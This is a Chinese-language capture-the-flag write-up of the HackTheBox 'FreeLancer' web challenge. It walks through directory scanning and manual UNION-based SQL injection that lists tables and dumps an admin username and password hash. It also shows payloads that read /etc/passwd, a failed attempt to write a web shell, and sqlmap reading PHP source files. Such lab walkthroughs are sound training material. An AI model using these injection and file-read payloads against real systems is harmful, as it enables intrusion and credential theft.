htb系列-Web Challenges-FreeLancer

FreeLancer

信息收集

第一次玩htb，随便开道web试试

看样子是个人搭建的博客

多的不说了，dirsearch扫一下，发现有mail目录信息泄露，访问后发现其目录下有contact_me.php文件，但是访问500

页面上只有一个contact的功能，抓下包发现访问的即是contact_me.php

证明考点可能是在这了

但是无论怎么测试发现都是返回500，这里思路断了。

查看下源码，发现有hint

这还不是sql注入？我当场吃掉

sql注入

sqlmap跑的太慢了，直接手注了

?id=-1%20union%20select%201,database(),3            
//freelancer

?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='freelancer'
//portfolio,safeadmin

?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='freelancer' and table_name='safeadmin'
//id,username,password,created_at

?id=-1 union select 1,group_concat(username),3 from freelancer.safeadmin

username：safeadm 
password:$2y$10$s2ZCi/tHICnA97uf4MfbZuhmOZQXdCnrM9VM9LBMHPp68vAXNRf4K

密码值无从得知，然后数据库里没找到flag

这里本来想写shell到mail目录下，可能开了权限，有waf，目录不对什么的把，写不进去

先读一下目录吧，确定目录是对的，那可能就是权限问题无法写shell了

再尝试读其他地方

-1%20union%20select%201,load_file(%27/etc/passwd%27),3

这里思路又断了，每次思路断了我就掏出我的超级无敌大字典，爆它鸭的

爆出路径/administrat

访问发现需要登陆，这里有两种方法，带入数据库查询或，直接sqlmap读源码都可

sqlmap读源码

--file-read=/var/www/html/administrat/panel.php